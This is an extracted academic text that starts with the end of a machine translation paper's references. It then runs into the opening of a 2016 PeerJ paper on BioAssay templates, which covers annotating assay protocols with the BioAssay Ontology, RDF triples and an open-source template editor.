EACL, Avignon, France. Philipp Koehn and Kevin Knight. 2002. Learning a Translation Lexicon from Monolingual Corpora. In Proceedings of the ACL Workshop on Unsupervised Lexical Acquisition, Philadelphia, PA, USA. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007. Moses: Open Source Toolkit for Statistical Machine Translation. In Pro- ceedings of ACL, Prague, Czech Republic. Angeliki Lazaridou, Georgiana Dinu, Adam Liska, and Marco Baroni. 2015. From Visual Attributes to Ad- jectives through Decompositional Distributional Se- mantics. Transactions of the Association for Compu- tational Linguistics, 3. 499 Tomas Mikolov, Quoc V. Le, and Ilya Sutskever. 2013a. Exploiting Similarities among Languages for Machine Translation. CoRR, abs/1309.4168. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013b. Distributed Representa- tions of Words and Phrases and their Compositionality. In Proceedings of NIPS, Lake Tahoe, NV, USA. Jeff Mitchell and Mirella Lapata. 2010. Composition in Distributional Models of Semantics. Cognitive Sci- ence, 34(8). Dragos Stefan Munteanu and Daniel Marcu. 2005. Im- proving Machine Translation Performance by Exploit- ing Non-Parallel Corpora. Computational Linguistics, 31(4):477–504. Toshiaki Nakazawa, Manabu Yaguchi, Kiyotaka Uchi- moto, Masao Utiyama, Eiichiro Sumita, Sadao Kuro- hashi, and Hitoshi Isahara. 2016. ASPEC: Asian Scientific Paper Excerpt Corpus. In Proceedings of LREC, Portorož, Slovenia. Malte Nuhn, Arne Mauser, and Hermann Ney. 2012. De- ciphering Foreign Language by Combining Language Models and Context Vectors. In Proceedings of ACL, Jeju Island, Korea. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: a Method for Automatic Evaluation of Machine Translation. In Proceedings of ACL, Philadelphia, PA, USA. Reinhard Rapp. 1995. Identifying Word Translations in Non-parallel Texts. In Proceedings of ACL, Cam- bridge, MA, USA. Sujith Ravi and Kevin Knight. 2011. Deciphering For- eign Language. In Proceedings of ACL-HLT, Portland, OR, USA. Avneesh Saluja, Hany Hassan, Kristina Toutanova, and Chris Quirk. 2014. Graph-based Semi-Supervised Learning of Translation Models from Monolingual Data. In Proceedings of ACL, Baltimore, MD, USA. Richard Socher, John Bauer, Christopher D. Manning, and Andrew Y. Ng. 2013a. Parsing with Compo- sitional Vector Grammars. In Proceedings of ACL, Sofia, Bulgaria. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Ng, and Christopher Potts. 2013b. Recursive Deep Models for Semantic Compositionality Over a Sentiment Treebank. In Pro- ceedings of EMNLP, Seattle, WA, USA. Masao Utiyama and Hitoshi Isahara. 2003. Reliable Measures for Aligning Japanese-English News Arti- cles and Sentences. In Proceedings of ACL, Sapporo, Japan. Ivan Vulić and Anna Korhonen. 2016. On the Role of Seed Lexicons in Learning Bilingual Word Embed- dings. In Proceedings of ACL, Berlin, Germany. Guillaume Wisniewski, Alexandre Allauzen, and François Yvon. 2010. Assessing Phrase-Based Trans- lation Models with Oracle Decoding. In Proceedings of EMNLP, Cambridge, MA, USA. Jiajun Zhang and Chengqing Zong. 2013. Learning a Phrase-based Translation Model from Monolingual Data with Application to Domain Adaptation. In Pro- ceedings of ACL, Sofia, Bulgaria. Bing Zhao and Stephan Vogel. 2002. Adaptive parallel sentences mining from web bilingual news collection. In Proceedings of IEEE ICDM, Maebashi, Japan. Kai Zhao, Hany Hassan, and Michael Auli. 2015. Learn- ing Translation Models from Monolingual Continu- ous Representations. In Proceedings of NAACL-HLT, Denver, CO, USA. 500 work_ryxojgna3vbkfek5l2onbkh3vu ---- BioAssay templates for the semantic web BioAssay templates for the semantic web Alex M. Clark, Nadia K. Litterman, Janice E. Kranz, Peter Gund, Kellan Gregory and Barry A. Bunin Collaborative Drug Discovery, Inc., Burlingame, CA, United States of America ABSTRACT Annotation of bioassay protocols using semantic web vocabulary is a way to make experiment descriptions machine-readable. Protocols are communicated using concise scientific English, which precludes most kinds of analysis by software algorithms. Given the availability of a sufficiently expressive ontology, some or all of the pertinent information can be captured by asserting a series of facts, expressed as semantic web triples (subject, predicate, object). With appropriate annotation, assays can be searched, clustered, tagged and evaluated in a multitude of ways, analogous to other segments of drug discovery informatics. The BioAssay Ontology (BAO) has been previously designed for this express purpose, and provides a layered hierarchy of meaningful terms which can be linked to. Currently the biggest challenge is the issue of content creation: scientists cannot be expected to use the BAO effectively without having access to software tools that make it straightforward to use the vocabulary in a canonical way. We have sought to remove this barrier by: (1) defining a BioAssay Template (BAT) data model; (2) creating a software tool for experts to create or modify templates to suit their needs; and (3) designing a common assay template (CAT) to leverage the most value from the BAO terms. The CAT was carefully assembled by biologists in order to find a balance between the maximum amount of information captured vs. low degrees of freedom in order to keep the user experience as simple as possible. The data format that we use for describing templates and corresponding annotations is the native format of the semantic web (RDF triples), and we demonstrate some of the ways that generated content can be meaningfully queried using the SPARQL language. We have made all of these materials available as open source (http://github.com/cdd/ bioassay-template), in order to encourage community input and use within diverse projects, including but not limited to our own commercial electronic lab notebook products. Subjects Bioinformatics, Computational Biology, Human-Computer Interaction, Data Science Keywords Assay protocols, Semantic web, BioAssay Ontology, Common Assay Template, Machine learning INTRODUCTION One of the major problems currently being faced by biologists charged with the task of performing experimental assays on pharmaceutically interesting molecules is the information burden involved with handling collections of assay descriptions. Individual laboratories may carry out hundreds or even thousands of screening experiments each year. Each of these experiments involves a protocol, and any two experiments may be identical, similar, or completely different. The typical practice for describing bioassay protocols, for both external communication and internal record keeping, How to cite this article Clark et al. (2016), BioAssay templates for the semantic web. PeerJ Comput. Sci. 2:e61; DOI 10.7717/peerj-cs.61 Submitted 26 January 2016 Accepted 19 April 2016 Published 9 May 2016 Corresponding author Alex M. Clark, aclark.xyz@gmail.com Academic editor Harry Hochheiser Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.61 Copyright 2016 Clark et al. Distributed under Creative Commons CC-BY 4.0 http://github.com/cdd/bioassay-template http://github.com/cdd/bioassay-template http://dx.doi.org/10.7717/peerj-cs.61 mailto:aclark.�xyz@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.61 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ is to use concise scientific English, which is the most universally human readable method of communication, assuming the recipient is familiar with the relevant jargon. Unfortunately this method is not scalable. Even given the availability of an expert, it is often quite difficult and time-consuming to read two assay description paragraphs and provide a metric for the degree to which two protocols differ. There are many workflow scenarios where comparison of protocols is necessary, e.g. searching through a collection of previous experiments, or making a judgment call as to whether two batches of small molecule measurements are comparable. Attempting to use software to assist with such tasks, when the substrate is unconstrained text, results in solutions that are crude at best. While these issues with scalability could be described as a relatively minor nuisance in a small laboratory, the field of drug discovery has lately been undergoing a renaissance of open data (Clark, Williams & Ekins, 2015; Hersey, Senger & Overington, 2012; Ecker & Williams-Jones, 2012; Williams, Wilbanks & Ekins, 2012). Services such as PubChem provide a truly massive resource (Helal et al., 2016); PubChem alone provides more than a million unique bioassay descriptions, and is growing rapidly (Bolton, 2015). 1 Such data are supplemented by carefully curated resources like ChEMBL (Gaulton et al., 2012), which are much smaller but have strict quality control mechanisms in place. What these services have in common is that their bioassay protocols have very little machine- readable content. In many cases, information about the target, and the kind and units of the measurements, have been abstracted out and represented in a marked up format, but all of the remaining particulars of the protocol are ensconced within English grammar, if at all. In order to address this problem, the BioAssay Ontology (BAO) was devised (Abeyruwan et al., 2014; Vempati et al., 2012). 2 The BAO, which includes relevant components from other ontologies, is a semantic web vocabulary that contains thousands of terms for biological assay screening concepts, arranged in a series of layered class hierarchies. The BAO is extensive and detailed, and easily extensible. The vocabulary is sufficiently expressive to be used for describing biological assays in a systematic way, yet it has seen limited use. Influential projects such as PubChem (Kim et al., 2016), ChEMBL (Willighagen et al., 2013), BARD (de Souza et al., 2014) and OpenPHACTS (Williams et al., 2012) make use of the ontology, but the level of description in each is shallow, using only a small fraction of the terms. There are a number of factors holding back scientists from using the BAO and related ontologies to describe their assays in detail, with perhaps the most substantial being the lack of software that makes the annotation process fast and convenient. Because it is based on the semantic web, BAO concepts are expressed as triples, of the form [subject, predicate, object]. There are no hard rules about how this is applied, which is a characteristic of the semantic web, and is both an asset and a liability. The simplest way to consider annotating a particular feature of an assay, e.g. the biological process, is to compose a triple of a form such as [assay ID, biological process, viral genome replication]. Each of these three fields is a uniform resource indicator (URI), which points to a globally unique object with established meaning. In this case, assay ID would 1 It should be noted that the majority of the first million PubChem assays do not contain detailed experimental assay descriptions. Contributors such as the Broad Institute and organizations affiliated with the Molecular Libraries Screening Center can be selected by browsing the sources: http://pubchem. ncbi.nlm.nih.gov/sources/sources.cgi. 2 The materials for the BAO can be found at http://bioassayontology.org. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 2/24 http://pubchem.ncbi.nlm.nih.gov/sources/sources.cgi http://pubchem.ncbi.nlm.nih.gov/sources/sources.cgi http://bioassayontology.org http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ correspond to an identifier that the user has created for the assay description; biological process corresponds to a specific property in the BAO that is used to link assays and the biological process that is being affected; and viral genome replication refers to a class in the BAO, which identifies a specific instance of a biological process, which is in turn inherited from a sequence of increasingly general classes, and may also be linked to any other node within the greater semantic web, such as the extensive Gene Ontology (GO) (The Gene Ontology Consortium, 2015). In principle, screening biologists can use the properties and classes from the BAO to annotate their assays intelligently in a machine readable format that is compatible with the universe of the semantic web. If large numbers of assays were sufficiently annotated, biologists and other drug discovery scientists could perform advanced searches and filtering that would enable better interpretation of results, enhanced building of machine-learning models, and uncovering of experimental artifacts. Despite the clear benefits of semantic annotation, the BAO remains largely unused, the primary reason being its lack of accessibility. The BAO and its linked dependencies are large, and can be expected to keep growing as they are extended to capture more biological concepts. For an interactive view onto these terms, the site http://bioportal. bioontology.org/ontologies/BAO should be used to peruse the hierarchy. 3 Figure 1 shows two snapshots of part of the BAO hierarchy, using the BioPortal resource. The classes (Fig. 1A) that make up the ontology contain the bulk of the terms and provide most of the expressive value, while the properties (Fig. 1B) are used to provide context. The class hierarchy is in places many levels deep, and although it is arranged in a logical pattern, it is nonetheless necessary to be familiar with the entire layout in order to meaningfully annotate an assay protocol. Even an expert biologist familiar with the entire ontology would be presented with multiple degrees of freedom for deciding how to annotate a protocol; this is a fundamental problem for machine readability, which requires uniform consistency. In our previous work we addressed the end-user problem, and invented technology that applies to the scenario when a user is presented with plain English text, and is charged with the task of selecting the appropriate semantic annotations. Our solution involved a hybrid approach that combined natural language processing with machine learning based on training data, with an intuitive interface that helps the user select the correct annotations, leaving the final choice in the hands of the scientist (Clark et al., 2014). During this process we found that the challenge that we were unable to fully overcome was the burden of creating new training data. The BAO vocabulary defines more than 2,500 classes, in addition to properties and terms from other ontologies, all of which can be expected to grow as the BAO is increasingly used for more biological content. Considering each term as it applies to a given assay requires a high level of expertise of the BAO itself. For example, the NIH’s Molecular Libraries Program’s bioassay database, known as the BARD, employed dedicated research staff to annotate more than two thousand assays (de Souza et al., 2014). The absence of clear and straightforward guidance as to which terms to use under what circumstances is preventing adoption of the BAO 3 It can also be browsed and edited using software such as Protégé, which can be found at http://protege.stanford.edu. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 3/24 http://bioportal.bioontology.org/ontologies/BAO http://bioportal.bioontology.org/ontologies/BAO http://protege.stanford.edu http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ by drug discovery scientists. For our model building efforts, we made use of a training data set made up of 1066 PubChem bioassays that each had more than a hundred terms associated with them (Wang et al., 2014; Schürer et al., 2011), although not all of the annotations were able to be matched to ontology terms. For purposes of creating additional training data, we experienced considerable difficulty finding what we considered to be canonical annotations for any given assay. The BAO is essentially a vocabulary that is capable of describing many assay properties, but it lacks instructions on its use. This is an issue that we have undertaken to solve, and in this article we describe our approach to providing this critical missing component. We describe a data model called the BioAssay Template (BAT), which consists of a small number of terms which are organized to describe how the BAO and linked ontologies should be used to describe a particular kind of bioassay. A template is essentially a gateway to the overall ontology, which divides the assay annotation process into a fixed hierarchy of assignments, each of which has a prescribed list of values, which are cherry-picked from the overall ontology. The BAT vocabulary can be used to create any number of templates, which can be customized to suit the task at hand. As a starting point, we have created what we refer to as the common assay template (CAT). CAT is an annotation recipe that is intended to capture the major properties that most biologists need to describe their assays and that enables most drug discovery scientists to have a basic understanding of an assay and its results. A condensed summary of this template is shown in Fig. 2. Unlike the class hierarchy of the BAO, the tree structure of the CAT is flat. While the data model allows groups Figure 1 A selection of the BAO hierarchy, visualized using BioPortal (http://bioportal.bioontology.org). (A) classes and (B) properties. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 4/24 http://bioportal.bioontology.org http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ and subgroups, our current template errs on the side of simplicity, and includes just 16 different assignments, each of which is associated directly with the top-level assay, and each of which has a list of associated values (examples shown in Fig. 2). A template can be customized as necessary, and once it is ready, it can be used to define the way in which assays are annotated. The data model is designed to enable software to compose a user interface: presenting each of the categories, and making use of the selected values as the options that are made available to the user. It is essentially a way to restrict and simplify the large scope of the BAO, reduce the degrees of freedom, and remove ambiguity. Having curated the assignments and values so that the lists consist of the minimum number of relevant possibilities, each of them decorated by a meaningful label and a more detailed description, it becomes possible to design a user experience that is suitable for a scientist who is an expert in the field, but does not necessarily know anything about semantic web concepts. In order to explore this approach, we have created a software package called the BioAssay Schema Editor, which is open source and available via GitHub. It is written using common assay template URI: http://www.bioassayontology.org/bas# bioassay type has bioassay ADMET apoptosis assay beta galactosidase enzyme activity assay beta galactosidase reporter gene assay beta lactamase reporter gene assay binding assay bioavailability assay calcium redistribution assay cAMP redistribution assay (+ 79 more) assay format has assay format biochemical format cell based format cell membrane format cell-free format cytosol format microsome format mitochondrion format nuclear extract format nucleic acid format (+ 10 more) assay design method has assay design method antigen down assay ATP quantitation ATP quantitation using luciferase beta galactosidase induction beta lactamase induction binding assessment method caspase activity determination cell cycle progression assessment method cell movement measurement method (+ 67 more) assay cell line is cell line of 293 cell 293T/17 cell A2780 A549 cell ACHN cell AML12 cell BA/F3 cell BJ BSC-1 (+ 86 more) organism has organism Arabidopsis thaliana bacterium Bluetongue virus 10 Bos taurus Caenorhabditis elegans Candida albicans Canis lupus familiaris cellular organisms Chlorocebus aethiops (+ 56 more) biological process has biological process absence alternative mRNA splicing, via spliceosome ambiguous apoptotic process autophagy biofilm formation calcium-mediated signaling using intracellular calcium source_bao cAMP-mediated signaling_BAO cell cycle (+ 45 more) target has biological macromolecule adhesion carbohydrate chaperone cytosolic protein enzyme enzyme regulator G protein G protein coupled receptor generic hydrolase (+ 29 more) assay mode of action has mode of action activation agonism antagonism competitive binding inhibition irreversible binding ligand binding mode of action ligand function mode of action modulation (+ 4 more) result has result 50 percent activation 50 percent inhibition 80 percent inhibition 90 percent inhibition AC10 absolute AC1000 absolute AC26 absolute AC35 absolute AC40 absolute (+ 85 more) result unit of measurement has unit of measurement angstrom catalytic (activity) concentration unit cell concentration unit cells per milliliter centimeter century concentration unit concentration unit counts per second (+ 47 more) assay screening campaign stage has assay stage alternate assay conditions alternate assay format alternate assay type alternate cell line assay alternate confirmatory assay alternate organism assay alternate target assay compound aggregation assay compound fluorescence assay (+ 14 more) assay footprint has assay footprint 1536 well plate 24 well plate 384 well plate 96 well plate array cuvette gene array HYPER flask microplate (+ 11 more) assay kit uses assay kit Adapta Universal Kinase Assay Kit ADP Glo Kinase Assay ADP Hunter Plus AlphaScreen cAMP assay kit AlphaScreen cGMP Detection AlphaScreen GST detection kit AlphaScreen IgG detection kit AlphaScreen Phosphotyrosine Assay Kit Alphascreen second messenger IP1 detection kit (+ 84 more) physical detection method has detection method absorbance alphascreen atomic absorption spectrophotometry bio layer interferometry bioluminescence brightfield microscopy carbon nanotube based sensor chemiluminescence circular dichroism (+ 42 more) detection instrument uses detection instrument 3i Marianas 8453 UV-Visible Spectrophotometer Acumen AlphaQuest reader AMINCO-Bowman Series 2 Luminescence Spectrometer Analyst HT API 4000 LC/MS/MS System Applied biosystems 8200 ArrayScan 3.1 HCS Reader (+ 88 more) perturbagen type has perturbagen compound library DIVERSet LOPAC 1280 miRNA library MLSMR library NINDS library shRNA library siRNA library The NatProd Collection Figure 2 An overview of the CAT at the time of publication. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 5/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ Java 8, and runs on the major desktop platforms (Windows, Mac & Linux). The software implements the data model that we describe in this article. Our priorities for this work are to: (1) establish a data model for bioassay templates; (2) create an intuitive software package for editing these templates and using them to annotate real data; and (3) collaboratively establish a CAT for general purpose use. We have put a considerable amount of effort into the user interface for editing templates, even though we expect only a small fraction of biologists will ever be directly involved in editing them. We have also invested significant effort towards developing a one-size-fits-most template, the CAT. Our goal with the CAT was to enable capture of ∼80% of the most commonly used terms, and present them in a logical and concise way, so that a large proportion of users will be able to use it as-is to add a significant amount of value to their protocol data. In addition, the CAT can act as a starting point for modification if scientists would like to tailor the template. Scientists working in research groups that routinely make use of terms that are not included in the CAT can elect to start with an existing template and add the missing assignments and values, and also delete whole groups of content that do not apply to their research. A research group may accumulate a collection of task-specific templates, allowing their scientists to pick the most appropriate one. By ensuring that the editor software is easy to use, runs on all platforms, and is open source, we hope to ensure that this option is quite practical for any research group with access to basic information technology expertise. We intend to encourage the community to make use of these resources, both as standalone tools and interoperating with the electronic lab notebook software that we are presently designing. One of the implicit advantages of using semantic web technology as the underlying data format (triples), and a well established set of reference terms (the BAO and various linked ontologies), is that even if two scientists are annotating assays with different templates, it is highly likely that many or most of the terms will overlap, even if the templates were created from scratch. Since the final deliverable for an annotated assay is the semantic web, it means that the output can be subjected to the entire universe of software designed to work with RDF triple stores. 4 As more assays are annotated, the scope and power of queries and informatics approaches for enhancing drug discovery projects are similarly increased. With a large corpus of annotated assays available, scientists will be able to make better use of prior work for understanding structure activity relationships, uncovering experimental artifacts, building machine-learning models, and reducing duplicated efforts. METHODS Data model The semantic description of templates and annotations uses a small number of additional URIs, each of which has the root stem http://bioassayontology.org/bat, and is denoted using the Turtle-style 5 abbreviated prefix “bat.” The hierarchical model for describing a template is shown in Fig. 3. Parent:child relationships denoted by an arrow indicate one-to-many relationships, while the 4 See W3C Resource Description Framework: http://www.w3.org/RDF. 5 See W3C RDF Turtle: http://www.w3. org/TR/turtle. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 6/24 http://bioassayontology.org/bat http://www.w3.org/RDF http://www.w3.org/TR/turtle http://www.w3.org/TR/turtle http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ properties listed in the boxes underneath the nodes are one-to-one relationships. A template definition begins with the root, which is distinguished by being of type bat: BioAssayTemplate. The root is also of type bat:Group, and has some number of child nodes, which are themselves either assignments or subgroups. An assignment node has several scalar properties, including label and description, and it also refers to a property resource. These are typically mapped to URI resources found within the BAO (e.g. http://www.bioassayontology.org/bao#BAO_0000205, label: “has assay format”). Each assignment has some number of values associated with it, and these make up the list of available options. Each value is primarily identified by the resource that it maps to, which is typically found in the BAO (e.g. http://www.bioassayontology.org/ bao#BAO_0000219, label: “cell based format”). Besides the label and description, which are customizable within the template data model, the reference URI has its own implied class hierarchy (e.g. “cell based format” is a subclass of “assay format”), which is not encoded in the template data model, but is inferred once it is paired with the BAO and its linked ontologies. The schema for annotation of assays is shown in Fig. 4. The assay is given a distinct URI, and is associated with several properties such as label and description. The template is recorded, as is an optional reference to the origin of the assay (which may be a semantic web resource, or a DOI link to a journal article). The free-text description of the assay can also be recorded using the hasParagraph predicate. The assay is associated with some number of annotations, which are primarily linked to assignments within the corresponding template. For annotations that assert a URI link, the hasValue predicate typically corresponds to one of the available values that was prescribed for the assignment in the template definition, and generally refers to a term defined in the BAO, though custom references can be used–or the annotation may be specified using the hasLiteral predicate instead, which means that the user has entered data in a different form, typically text or a numeric value. The hasProperty predicate is generally copied from the corresponding assignment. When annotating an assay, each assignment may be used any number of times, i.e. zero instances means that it has been left blank, while asserting two or more triples means that Root Assignment Group Value rdf:type bat:BioAssayTemplate rdf:type bat:Group rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string rdf:type bat:Assignment rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string bat:hasProperty reference rdf:type bat:Group rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string bat:mapsTo reference Group Assignment bat :ha sAs sign me nt bat:hasGroup bat:hasValue Figure 3 BAT data model, which is used to describe a template. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 7/24 http://www.bioassayontology.org/bao#BAO_0000205 http://www.bioassayontology.org/bao#BAO_0000219 http://www.bioassayontology.org/bao#BAO_0000219 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ all of the values apply. The relationship between assays and annotations has no nesting: the intrinsic group/sub-group structure of any particular annotation can be inferred from the template, since the usesTemplate and isAssignment predicates refer to the origins in the template. Software The BioAssay Schema Editor is available from GitHub (https://github.com/cdd/bioassay- template) and may be used under the terms of the Gnu Public License 2.0. 6 The code is written using Java 8, and the user interface is based on JavaFX. Semantic web functionality is implemented by incorporating the Apache Jena library. 7 The project includes a snapshot of the BAO 8 and some of the linked ontologies, as well as the latest version of the CAT schema. It should be assumed that the project will continue to evolve until well after the publication date of this article. The application operates on a datafile referred to as a schema, which is represented as a collection of triples (in Turtle format, with the extension .ttl). A schema is expected to include a single template, for which the root node is of type bat:BioAssayTemplate, and may optionally contain any number of assays that have been (or will be) annotated using that same template. Triples are used as the serialization format in order that the editable files can be used as-is by a Triple store, and become a part of the semantic web with no further modification. Figure 5 shows the main window for the application, which has loaded a contemporary version of the CAT, and has several accompanying assays awaiting annotation. The components that make up the template are shown as a hierarchy on the left hand side of the panel. Selecting any of the groups or assignments causes the detail view on the right to be filled in with the corresponding content. Adding, deleting, renaming etc. of groups, assignments and values is fairly mundane, and follows standard desktop user interface design patterns. Selecting URI values for properties and values requires a more specific interface, and is composed by summarizing the BAO vocabulary, which is loaded into the application at the beginning. Resources can be selected using a dialog box that can present the list of options in a flat list, with an optional search box for restricting the list (Fig. 6A) or by using the hierarchy view that shows the position in the BAO ontology (Fig. 6B). Assay Annotation rdf:type bat:BioAssayDescription rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string bat:usesTemplate reference bat:hasParagraph ^^xsd:string bat:hasOrigin reference bat:hasAnnotation isAssignment reference rdfs:label ^^xsd:string bat:hasDescription ^^xsd:string bat:hasProperty reference bat:hasValue reference bat:hasLiteral literal Figure 4 Data model for annotated assays, which is used to apply a template to a specific assay. 6 Gnu Public License 2.0: http://www.gnu. org/licenses/gpl-2.0.en.html: the license allows anyone to use the source code for any purpose, on the condition that products making use of it must be made available under a license that is at least as open. Copyright for the project is held by Collaborative Drug Discovery, Inc. 7 See Apache Jena project: http://jena. apache.org. 8 Downloadable OWL files for the BAO: http://bioassayontology.org/ bioassayontology. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 8/24 https://github.com/cdd/bioassay-template https://github.com/cdd/bioassay-template http://www.gnu.org/licenses/gpl-2.0.en.html http://www.gnu.org/licenses/gpl-2.0.en.html http://jena.apache.org http://jena.apache.org http://bioassayontology.org/bioassayontology http://bioassayontology.org/bioassayontology http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ The dialog box can also be used to add multiple values at once, which is particularly convenient when a branch of the BAO encompasses multiple terms that are all valid options. When a resource is selected, its label and description are imported from the BAO into the template: these values can be edited after the fact, but by default they are the same as in the underlying vocabulary. Figure 5 A snapshot of the BioAssay Schema Editor. On the left hand side the current template is shown at the top (with its hierarchy of groups and assignments), and any assays currently in progress shown underneath. The panel on the right shows the details for an assignment–assay format– and the prescribed values that are associated with it. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 9/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ The primary role of the schema editor is to provide a convenient way to edit templates, but in support of this goal, it also provides an interface to use the template to annotate assays. The interface can be used for generating training data (e.g. for model generation), but it is mainly intended as a way to ‘test drive’ the current template. Because the annotation process is directly derived from the template, having the two editing processes side by side is advantageous when the template is being designed. For example, the operator can begin annotating an assay, and if a value is missing from one of the assignments, or a new kind of assignment turns out to be necessary, this can be added to the template within the same editing session. Figure 7A shows an example of an assay that has been annotated. The detail view has a placeholder for description text, which is particularly useful when the content has been imported from some external source, and the annotations are being made by converting the protocol text into semantic annotations. Clicking on any of the annotation buttons brings up a panel of options (Fig. 7B) that represent the prescribed values for the assignment. Each of the assignments can be left blank, annotated once, or given multiple values. The ideal use case is when the value (or values) occurs within the list of prescribed values, but since the data model allows any URI, the user interface also allows the user to insert a custom URI. In cases where no URI is listed in the template (e.g. a concept that does not have an established URI), it is possible to add plain text for any of the assignment annotations. While this has no meaning from a machine-learning point of view, it can serve as a convenient placeholder for terms that will be invented in the future. RESULTS Templates We set out to create a CAT that includes the basic details essential to defining any bioassay: assay type, format, target and biology, results and pharmacology, and other details. Figure 6 A snapshot of the two main tabs used for locating a value in the BAO. (A) shows the list view, which is flat, while the (B) shows the values in context of the actual hierarchy of the underlying ontology. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 10/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ The CATwas developed with the opposing goals of identifying assignments that (1) would be limited in number in order to be not overly burdensome vs. (2) comprehensively cover the majority of the information contained in written descriptions of bioassays. We also considered the type of information that would be utilized by an end user attempting to search, filter, and aggregate assays by their bioassay annotations. For example, details such as the assay footprint (plate type), assay kit, and detection instrument were included because they may be useful terms for identifying experimental artifacts. Biological process and other target-related information were included to enable aggregating results across similar drug discovery projects for model-building and other applications. Finally, we limited assignments to those where the BAO offered sufficient options for possible values. Since the goal of the project is to generate machine-readable assay annotations, we avoided assignments where BAO terms were not available, such as those characterizing in vivo assays, and especially assignments whose values would be very specific for each assay, such as negative and positive controls. These areas will be addressed in the future once the underlying vocabulary (BAO or otherwise) is available sufficient to expand the domain. Similarly, the CAT falls short of capturing detailed protocol steps. In its present incarnation, it cannot be considered as a complete replacement for the text that is typically used to describe an assay, though we do intend to pursue this level of detail in future work. For the present, we are primarily concerned with utilizing the rich vocabulary within the BAO to achieve maximum impact with minimum additional burden on the end user workflow. Figure 7 A snapshot of the annotation interface that is available within the template editor. (A) The current template can be applied to specific assays within the same overall user interface, which is a convenient way to evaluate its suitability. Selecting any of the assignments brings up a dialog box presenting all of the prescribed values (B). Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 11/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ To develop the CAT, we used the following process: first, biologists independently considered each of the terms available in the BAO and prioritized assignments for the CAT. Each assignment was associated with a number of possible values based on the BAO hierarchy. Then, quantitative and qualitative approaches were used to determine if the prioritized assignments included in the CAT were sufficient to fully describe most assays. For the quantitative approach, we assessed the set of 1066 PubChem bioassays (Wang et al., 2014) that were previously annotated by hand by BAO experts (Schürer et al., 2011). In that exercise, the BAO experts aimed to fully annotate each assay, capturing all applicable information for more than a hundred different categories or terms. If there was not an applicable value, the assignment or category was left blank. We analyzed the use of the BAO terms to assess the utility and comprehensiveness of the assignments included in the CAT compared to the remaining terms. We found that the 16 CAT assignments were annotated in 81% of the 1066 PubChem assays compared to 33% for the remaining terms. We also found that 95% of the values for CATassignments were BAO terms rather than literal or non-URI based terms, compared to 63% in the remaining categories. These results suggested that the CAT includes assignments that are both relevant to the majority of assays as represented in PubChem and well covered by the BAO. For an in-depth qualitative assessment of the CAT, biologists annotated a wide variety of assays, encompassing different assay types (e.g., cell viability, enzyme activity, binding, and ADMET), assay formats (e.g., cell-based, biochemical, microsome, organism, tissue, etc.), and assay design methods (e.g., ATP quantitation, cell number, immunoassays, gene expression, radioligand binding, etc.), as summarized in Table 1. We found that in many cases, both from assay descriptions available from PubChem and from in-house screening assay descriptions, the CAT captured much of the relevant information. For example, annotating an assay for cell viability (PubChem ID 427) shows that all but two of the 16 CAT assignments are readily annotated from the short descriptive information provided (Fig. 8). ‘Target’ is left blank, as it is not applicable (this assay aims solely to identify cytotoxic compounds); ‘Detection Instrument’ was not noted. Similarly, as shown in Fig. 9, all applicable CAT assignments (15 of the 16) are annotated from the description of a competitive binding assay (PubChem ID 440). Figure 9 also illustrates that multiple values can be annotated for a single assignment, enabling content from complex assays to be captured. Together, these two examples highlight that both cell-based and biochemical assays can be extremely well-suited to be annotated using the CAT. However, there were some cases where the CAT was less effective in capturing important information. For example, 14 of the 16 CAT assignments could be annotated for PubChem ID 488847, some with multiple values; however, the ‘big picture’ view of this rather complex primary assay is not as readily apparent from its ‘CAT profile’ as from a single sentence in the description (Fig. 10). In addition, this PubChem record had extensive technical details such as reagent components, liquid handling volumes and instruments, times of incubation and plate processing steps, which could be important for identifying matching assays or interpreting the results. Another example of a poor fit for the CAT, as noted earlier, are in vivo assays. These are largely beyond the scope of this Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 12/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ PubChem Assay (ID 427) Origin: http://pubchem.ncbi.nlm.nih.gov/bioassay/427 has bioassay bioassay type cell viability assay has assay format assay format cell based format has assay design method assay design method ATP quantitation using luciferase is cell line of assay cell line HEK293 has 